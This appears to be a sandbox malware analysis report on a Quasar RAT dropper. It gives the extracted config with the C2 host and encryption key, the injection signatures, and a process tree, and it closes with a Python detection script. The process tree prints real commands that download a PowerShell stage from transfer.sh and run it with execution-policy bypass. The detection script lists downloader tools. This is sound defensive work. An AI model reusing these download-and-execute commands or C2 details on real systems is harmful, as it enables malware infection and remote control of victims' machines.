Analysis

max time kernel: 133s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17/01/2023, 08:11

Static task: static1
Behavioral task: behavioral1
  Sample: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
  Resource: win10v2004-20221111-en

General

Target: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Size: 547KB
MD5: b0ab211e83a23d58e1322e4d2d6f0a96
SHA1: d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
SHA256: 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
SHA512: 4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
SSDEEP: 3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config

Extracted: quasar
  version: 1.4.0
  tag (Quasar campaign tag): Office04
  C2 host: ghcc.duckdns.org:4782
  mutex: a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b
  encryption_key: B0326395AC2D48856CAE22978A087DF5DCF5816D
  install_name: Client.exe
  log_directory: Logs
  reconnect_delay: 3000
  startup_key: Update
  subdirectory: SubDir

Notes on the config: the C2 is a DuckDNS dynamic-DNS hostname on 4782, Quasar's default listener port, so the domain rather than an IP is the durable network indicator. Office04, SubDir, Client.exe, Logs and 3000 are the Quasar 1.4 builder defaults; the operator-specific values are the C2 host, the startup key name "Update", the mutex and the encryption key. If the client's install routine runs, it copies itself as %APPDATA%\SubDir\Client.exe and registers the "Update" autorun entry; neither was observed in this sandbox run (see Signatures and Processes below).
Signatures

Quasar payload (2 IoCs)
  resource: behavioral2/memory/3140-144-0x0000000000400000-0x0000000000484000-memory.dmp, yara_rule: family_quasar
  resource: behavioral2/memory/3140-145-0x000000000047E74E-mapping.dmp, yara_rule: family_quasar
  Both matches are in the memory of PID 3140 (RegAsm.exe), not in the submitted file, which is consistent with the payload being injected into a legitimate host process (see SetThreadContext and WriteProcessMemory below).

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence check.
  Key value queried: \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation (process: cmd.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation (process: WScript.exe)
  Caveat: the querying processes here are the built-in cmd.exe and WScript.exe hosts, not the payload, so this is low-confidence evidence of deliberate geofencing.

Adds Run key to start application (2 TTPs, 2 IoCs)
  Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce (process: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" (process: {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe)
  Caveat: this is not payload persistence. The IXP000.TMP extraction directory and the wextract_cleanup0 RunOnce entry are the standard behaviour of an IExpress (wextract) self-extracting package, which schedules advpack.dll,DelNodeRunDLL32 to delete its temp directory at next logon. The Quasar startup key "Update" from the extracted config was not written during this run.

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 46: api.ipify.org

Suspicious use of SetThreadContext (1 IoCs)
  PID 444 (powershell.exe) set the thread context of PID 3140 (RegAsm.exe, procid 92)
  Together with the eight WriteProcessMemory events from 444 into 3140 listed below and the family_quasar match in 3140's memory, this is the PowerShell stage injecting Quasar into a freshly started, argument-less RegAsm.exe.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  Caveat: this is a generic sandbox heuristic. Nothing else in this report (no mass file writes, no ransom note, no encryption activity) supports ransomware; drive enumeration is consistent with a RAT's file-manager and system-information features.

Modifies registry class (1 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings (process: cmd.exe)
  Routine shell activity; not an indicator on its own.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 444 powershell.exe (x2)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, PID 444 powershell.exe
  Token: SeDebugPrivilege, PID 3140 RegAsm.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
  PID 3140 RegAsm.exe

Suspicious use of WriteProcessMemory (24 IoCs)
  source PID -> target PID (source process, target procid), count
  2104 -> 4604 ({437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe, procid 80) x2
  4604 -> 3340 (cmd.exe, procid 82) x2
  3340 -> 4280 (WScript.exe, procid 83) x2
  4280 -> 1548 (cmd.exe, procid 85) x2
  1548 -> 796 (cmd.exe, procid 86) x2
  3340 -> 4264 (WScript.exe, procid 87) x2
  4264 -> 3424 (cmd.exe, procid 89) x2
  3424 -> 444 (cmd.exe, procid 90) x2
  444 -> 3140 (powershell.exe, procid 92) x8
  The paired parent-to-child writes are the normal process-creation pattern for each spawned process; the eight writes from powershell.exe into RegAsm.exe are the injection.
Processes

1. C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
   command line: "C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"
   PID: 2104
   - Adds Run key to start application
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SYSTEM32\cmd.exe
      command line: cmd /c new.vbs
      PID: 4604
      - Checks computer location settings
      - Modifies registry class
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WScript.exe
         command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"
         PID: 3340
         - Checks computer location settings
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\System32\cmd.exe
            command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
            PID: 4280
            - Suspicious use of WriteProcessMemory

            5. C:\Windows\system32\cmd.exe
               command line: cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
               PID: 1548
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\system32\curl.exe
                  command line: curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
                  PID: 796

         4. C:\Windows\System32\cmd.exe
            command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            PID: 4264
            - Suspicious use of WriteProcessMemory

            5. C:\Windows\system32\cmd.exe
               command line: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
               PID: 3424
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  command line: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                  PID: 444
                  - Suspicious use of SetThreadContext
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of WriteProcessMemory

                  7. C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                     command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                     PID: 3140
                     - Suspicious use of AdjustPrivilegeToken
                     - Suspicious use of SetWindowsHookEx

Execution chain summary: the submitted file is an IExpress self-extractor that unpacks new.vbs into %TEMP%\IXP000.TMP and runs it through cmd.exe. The VBScript launches two nested cmd.exe chains: the first uses the built-in curl.exe to fetch ss.ps1 from transfer.sh and save it as %APPDATA%\rr.ps1; the second runs that script with powershell.exe -exec Bypass. The PowerShell stage starts RegAsm.exe with no arguments and injects the Quasar client into it (WriteProcessMemory and SetThreadContext from PID 444 to PID 3140), after which RegAsm.exe requests SeDebugPrivilege and installs a Windows hook, consistent with Quasar's keylogging. Every executable in the chain except the dropper is a signed Windows binary, so detection has to rest on the parent/child relationships and command lines rather than on the images.
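The following Python script is an added example, not part of the sandbox report or of Quasar's own code. It runs three detection rules over constructed Sysmon-style process-creation events modelled on the tree above (PIDs and command lines are taken from the report; the parent of PID 2104 is assumed to be explorer.exe with PID 1000), and it classifies autorun registry writes so that the IExpress RunOnce cleanup entry from the Signatures section is separated from real payload persistence. The Run\Update = ...\SubDir\Client.exe entry in the sample data is constructed from the extracted config and was not observed in this run.

```python
"""Detection logic for the Quasar delivery chain in this report (added example).

The events below are constructed Sysmon-style process-creation records
modelled on the sandbox process tree; the parent of PID 2104 (PID 1000,
explorer.exe) is an assumption, not something the report shows.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full executable path
    cmdline: str


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"
CMD = r"C:\Windows\System32\cmd.exe"
CURL = r"https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1"
PS1 = r"powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

EVENTS: List[ProcEvent] = [
    ProcEvent(2104, 1000, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(4604, 2104, CMD, "cmd /c new.vbs"),
    ProcEvent(3340, 4604, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"'),
    ProcEvent(4280, 3340, CMD, f'"{CMD}" /c cmd.exe /c curl {CURL}'),
    ProcEvent(1548, 4280, CMD, f"cmd.exe /c curl {CURL}"),
    ProcEvent(796, 1548, r"C:\Windows\System32\curl.exe", f"curl {CURL}"),
    ProcEvent(4264, 3340, CMD, f'"{CMD}" /c cmd.exe /c {PS1}'),
    ProcEvent(3424, 4264, CMD, f"cmd.exe /c {PS1}"),
    ProcEvent(444, 3424, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS1),
    ProcEvent(3140, 444, REGASM, f'"{REGASM}"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
DOTNET_UTILS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
USER_PROFILE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)
EXEC_BYPASS = re.compile(r"-(?:ex|exec|ep|executionpolicy)\s+bypass", re.I)
SFX_CLEANUP = re.compile(r"advpack\.dll,DelNodeRunDLL32", re.I)


def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline: str) -> bool:
    """True if anything follows the (possibly quoted) image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.partition(" ")[2]
    return bool(rest.strip())


def ancestors(pid: int, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Walk the parent chain, stopping at unknown parents or cycles."""
    chain, seen, cur = [], {pid}, by_pid.get(pid)
    while cur is not None:
        parent = by_pid.get(cur.ppid)
        if parent is None or parent.pid in seen:
            break
        chain.append(parent)
        seen.add(parent.pid)
        cur = parent
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    by_pid = {e.pid: e for e in events}
    hits: List[Tuple[str, int]] = []
    for e in events:
        name = basename(e.image)
        anc_names = {basename(a.image) for a in ancestors(e.pid, by_pid)}
        parent = by_pid.get(e.ppid)
        # Rule 1: built-in downloader writing into the user profile under a script host.
        if name in DOWNLOADERS and USER_PROFILE.search(e.cmdline) and anc_names & SCRIPT_HOSTS:
            hits.append(("script_host_download", e.pid))
        # Rule 2: PowerShell with an execution-policy bypass running a script from AppData.
        if name == "powershell.exe" and EXEC_BYPASS.search(e.cmdline) and USER_PROFILE.search(e.cmdline):
            hits.append(("powershell_bypass_appdata_script", e.pid))
        # Rule 3: .NET framework utility started by PowerShell with no arguments
        # (these tools do nothing useful without one; a bare launch is an injection host).
        if name in DOTNET_UTILS and parent and basename(parent.image) == "powershell.exe" \
                and not has_arguments(e.cmdline):
            hits.append(("dotnet_utility_no_args", e.pid))
    return hits


def classify_autorun(key: str, name: str, value: str) -> str:
    """Separate the IExpress (wextract) RunOnce cleanup entry from real persistence.

    wextract registers RunOnce\\wextract_cleanupN = rundll32 advpack.dll,DelNodeRunDLL32
    to delete its IXP000.TMP directory at next logon; sandbox signatures fire on it anyway.
    """
    if (key.rsplit("\\", 1)[-1].lower() == "runonce"
            and name.lower().startswith("wextract_cleanup")
            and SFX_CLEANUP.search(value)):
        return "sfx_cleanup"
    return "persistence"


# Constructed autorun writes: the first is the entry observed in the report; the
# second is what the extracted Quasar config (startup_key "Update", subdirectory
# "SubDir", install_name "Client.exe") would write if the install routine ran.
AUTORUNS = [
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", "wextract_cleanup0",
     r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"'),
    (r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Update",
     r"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"),
]

if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:34} PID {pid}")
    for key, name, value in AUTORUNS:
        print(f"{classify_autorun(key, name, value):12} {key}\\{name}")
```

Rule 3 is the one worth tuning in a real environment: RegAsm.exe, RegSvcs.exe and InstallUtil.exe take an assembly path, so a launch with an empty command line from a scripting parent is rare in legitimate use, whereas the curl and PowerShell rules will need allow-listing for admin tooling that downloads into the user profile.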
Downloads

Filesize: 300.0MB
MD5: f7e7099eea0cc25fc49d04cd53c573a1
SHA1: 3abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256: b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512: c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074

Filesize: 5.1MB
MD5: 970aca768e68faa580f758a1a379686b
SHA1: 6a93921485cbd83382eb5a47315b1f0a67bcf684
SHA256: 6c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e
SHA512: 66dd4c5b17978e68c8e0cd2bc4fd35ba5d519447ff34259ec77d11e4253cbfc9955a43915ed3c343f41dc04d97f4302ab6922a823b0e0da44e8893d29ec7cf0f